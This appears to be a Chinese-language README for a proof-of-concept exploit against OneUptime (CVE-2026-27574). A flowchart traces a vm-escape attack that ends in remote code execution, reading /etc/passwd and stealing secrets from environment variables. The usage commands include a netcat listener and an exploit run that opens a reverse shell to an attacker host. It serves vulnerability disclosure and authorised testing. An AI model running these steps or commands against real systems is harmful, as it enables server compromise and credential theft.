
CVE-2026-27574 的概念验证漏洞利用程序,该漏洞是 OneUptime 中的一个严重代码注入漏洞,可实现远程代码执行和环境变量泄露。
漏洞利用类型: 远程
认证要求: 低权限(任意已注册的项目成员)
影响: 服务器完全沦陷、凭据窃取、集群接管
flowchart TD
A[开始] --> B[开放注册]
B --> C[注册新账户]
C --> D[创建新项目]
D --> E[获取 ProjectMember 角色]
E --> F[创建自定义 JavaScript 监控器]
F --> G[注入恶意 vm 逃逸载荷]
G --> H[探针每约 60 秒执行代码]
H --> I[通过构造函数链逃逸 vm 上下文]
I --> J[访问 process 与 child_process]
J --> K[执行系统命令]
J --> L[泄露环境变量]
K --> M[读取 /etc/passwd、id、hostname 等]
L --> N[提取 ONEUPTIME_SECRET、数据库/Redis 密码等]
M --> O[实现完全 RCE]
N --> O
O --> P[可选:反向 Shell / 数据外泄]
P --> Q[结束 - 系统已沦陷]# 启动监听器(如果使用反向 Shell)
nc -lvnp 4444
# 运行漏洞利用程序
python3 exploit.py http://target:3002 --lhost YOUR_IP --lport 4444
requests 库(pip install requests)此代码仅供教育和授权安全测试之用。
未经授权对您不拥有或未获明确许可测试的系统使用此代码,属于违法行为且不道德。
由 Mohammed Idrees Banyamer 开发 • 约旦 • @banyamer_security